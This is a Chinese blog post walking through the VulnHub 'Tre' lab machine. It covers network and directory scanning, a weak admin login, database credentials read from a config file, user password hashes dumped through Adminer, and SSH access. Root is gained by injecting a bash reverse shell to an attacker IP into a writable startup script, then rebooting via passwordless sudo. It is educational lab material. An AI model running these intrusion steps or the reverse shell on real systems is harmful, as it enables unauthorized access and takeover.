声明
该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。
靶机地址:
https://download.vulnhub.com/tre/Tre.zip
内容简介:
主机发现
端口扫描
信息收集
弱口令
进阶路径枚举
权限提升
1.1 主机发现
arp-scan -l
1.2 端口扫描
nmap -p- 192.168.112.130
1.3 信息搜集
nmap -p22,80,8082 -A 192.168.112.130Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-01 06:37 EDTStats: 0:00:07 elapsed; 0 hosts completed (1 up), 1 undergoing Service ScanService scan Timing: About 33.33% done; ETC: 06:37 (0:00:12 remaining)Nmap scan report for 192.168.112.130Host is up (0.00093s latency).PORT STATE SERVICE VERSIONopen ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)ssh-hostkey:2048 99:1a:ea:d7:d7:b3:48:80:9f:88:82:2a:14:eb:5f:0e (RSA)256 f4:f6:9c:db:cf:d4:df:6a:91:0a:81:05:de:fa:8d:f8 (ECDSA)256 ed:b9:a9:d7:2d:00:f8:1b:d3:99:d6:02:e5:ad:17:9f (ED25519)open http Apache httpd 2.4.38 ((Debian)): Tre: Apache/2.4.38 (Debian)open http nginx 1.14.2: Tre: nginx/1.14.2MAC Address: 00:0C:29:0B:39:35 (VMware)Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portDevice type: general purposeRunning: Linux 4.X|5.XOS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5OS details: Linux 4.15 - 5.6Network Distance: 1 hopService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTEHOP RTT ADDRESS1 0.93 ms 192.168.112.130OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .: 1 IP address (1 host up) scanned in 9.48 seconds
1.4 路径枚举
dirsearch -u http://192.168.112.130/
http://192.168.112.130/adminer.php
发现登录界面
http://192.168.112.130/system
弱口令账户 admin密码 admin
1.5 进阶路径枚举
登录之后会自动在请求头中生成 A
Authorization: Basic YWRtaW46YWRtaW4=oriz
dirsearch -u http://192.168.112.130/system/ --header="Authorization:Basic YWRtaW46YWRtaW4="
[07:19:36] 301 - 322B - /system/js -> http://192.168.112.130/system/js/[07:19:38] 403 - 280B - /system/.ht_wsr.txt[07:19:38] 403 - 280B - /system/.htaccess.bak1[07:19:38] 403 - 280B - /system/.htaccess.orig[07:19:38] 403 - 280B - /system/.htaccess.save[07:19:38] 403 - 280B - /system/.htaccess.sample[07:19:38] 403 - 280B - /system/.htaccess_extra[07:19:38] 403 - 280B - /system/.htaccess_orig[07:19:38] 403 - 280B - /system/.htaccess_sc[07:19:38] 403 - 280B - /system/.htaccessOLD[07:19:38] 403 - 280B - /system/.htaccessBAK[07:19:38] 403 - 280B - /system/.htaccessOLD2[07:19:38] 403 - 280B - /system/.htm[07:19:38] 403 - 280B - /system/.html[07:19:38] 403 - 280B - /system/.htpasswd_test[07:19:38] 403 - 280B - /system/.httr-oauth[07:19:38] 403 - 280B - /system/.htpasswds[07:19:39] 403 - 280B - /system/.php[07:19:46] 301 - 325B - /system/admin -> http://192.168.112.130/system/admin/[07:19:47] 403 - 280B - /system/admin/.htaccess[07:19:47] 302 - 0B - /system/admin/?/login -> http://192.168.112.130/system/login_page.php?return=%2Fsystem%2Fadmin%2Findex.php%3F%252Flogin%3D[07:19:47] 302 - 0B - /system/admin/ -> http://192.168.112.130/system/login_page.php?return=%2Fsystem%2Fadmin%2Findex.php[07:19:47] 302 - 0B - /system/admin/index.php -> http://192.168.112.130/system/login_page.php?return=%2Fsystem%2Fadmin%2Findex.php[07:19:54] 301 - 323B - /system/api -> http://192.168.112.130/system/api/[07:19:54] 200 - 1KB - /system/api/[07:19:58] 200 - 368B - /system/composer.json[07:19:58] 200 - 10KB - /system/composer.lock[07:19:58] 301 - 326B - /system/config -> http://192.168.112.130/system/config/[07:19:58] 200 - 2KB - /system/config/[07:19:59] 301 - 324B - /system/core -> http://192.168.112.130/system/core/[07:19:59] 301 - 323B - /system/css -> http://192.168.112.130/system/css/[07:20:01] 301 - 323B - /system/doc -> http://192.168.112.130/system/doc/[07:20:01] 200 - 2KB - /system/doc/[07:20:03] 301 - 325B - /system/fonts -> http://192.168.112.130/system/fonts/[07:20:06] 200 - 2KB - /system/images/[07:20:06] 301 - 326B - /system/images -> http://192.168.112.130/system/images/[07:20:07] 302 - 0B - /system/index.php -> http://192.168.112.130/system/login_page.php[07:20:07] 302 - 0B - /system/index.php/login/ -> http://192.168.112.130/system/login_page.php[07:20:08] 200 - 4KB - /system/js/[07:20:09] 301 - 324B - /system/lang -> http://192.168.112.130/system/lang/[07:20:09] 301 - 327B - /system/library -> http://192.168.112.130/system/library/[07:20:10] 302 - 0B - /system/login.php -> http://192.168.112.130/system/login_page.php?error=1&username=&return=my_view_page.php[07:20:18] 301 - 327B - /system/plugins -> http://192.168.112.130/system/plugins/[07:20:18] 200 - 2KB - /system/plugins/[07:20:20] 200 - 5KB - /system/readme.md[07:20:21] 301 - 327B - /system/scripts -> http://192.168.112.130/system/scripts/[07:20:21] 200 - 2KB - /system/scripts/[07:20:21] 302 - 0B - /system/search.php -> http://192.168.112.130/system/login_page.php?return=%2Fsystem%2Fsearch.php[07:20:23] 200 - 5KB - /system/signup.php[07:20:30] 200 - 0B - /system/vendor/composer/autoload_static.php[07:20:30] 200 - 0B - /system/vendor/composer/ClassLoader.php[07:20:30] 200 - 0B - /system/vendor/composer/autoload_classmap.php[07:20:30] 200 - 9KB - /system/vendor/composer/installed.json[07:20:30] 200 - 0B - /system/vendor/autoload.php[07:20:30] 200 - 1KB - /system/vendor/composer/LICENSE[07:20:30] 200 - 0B - /system/vendor/composer/autoload_psr4.php[07:20:30] 200 - 2KB - /system/vendor/[07:20:30] 200 - 0B - /system/vendor/composer/autoload_real.php[07:20:30] 200 - 0B - /system/vendor/composer/autoload_namespaces.php[07:20:30] 200 - 0B - /system/vendor/composer/autoload_files.php[07:20:31] 200 - 5KB - /system/view.php
以上为爬取路径
发现到了
http://192.168.112.130/system/config/
http://192.168.112.130/system/config/a.txt
找到了数据库的账号密码
http://192.168.112.130/adminer.php
填写信息登录
|
localhost |
|
mantissuser |
|
password@123AS |
|
mantis |
成功进入
选择mantis_user_table查看账号密码
|
username |
realname |
|
password |
|
administrator |
administrator |
root@localhost |
5f4dcc3b5aa765d61d8327deb882cf99 |
|
tre |
Tr3@123456A! |
tre@localhost |
64c4685f8da5c2225de7890c1bad0d7f |
ssh tre@192.168.112.130 -p 22 //密码为 Tr3@123456A!
成功登陆!
1.6 权限提升
find / -type f -perm -o=w -user root -ls 2>/dev/null | grep -v "/proc" | grep -v "/sys/fs/cgroup"ls -l /usr/bin/check-systemcat /usr/bin/check-system
发现/usr/bin/check-system
cd /etc | grep -Ri "check-system" 2>/dev/null //去 etc目录下 看看 那些需要利用 此脚本
操作系统重启后 可以 启动此脚本如果注入 一行 恶意代码 重启系统 执行脚本
vim /usr/bin/check-system/bin/bash -i >& /dev/tcp/192.168.112.128/4444 0>&1DATE=`date '+%Y-%m-%d %H:%M:%S'`echo "Service started at ${DATE}" | systemd-cat -p infowhile :doecho "Checking...";sleep 1;/bin/bash -i >& /dev/tcp/192.168.112.128/4444 0>&1 //插入 代码donesudo -lsudo shutdown -r now
在执行sudo -l时发现/sbin/shutdown是不需要密码的
在kali里面启动监听4444端口
拿到最高权限。
注:如有侵权请后台联系进行删除
觉得内容不错,请点一下"赞"和"在看"
原文始发于微信公众号(嗨嗨安全):靶机实战系列之Tre靶机
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论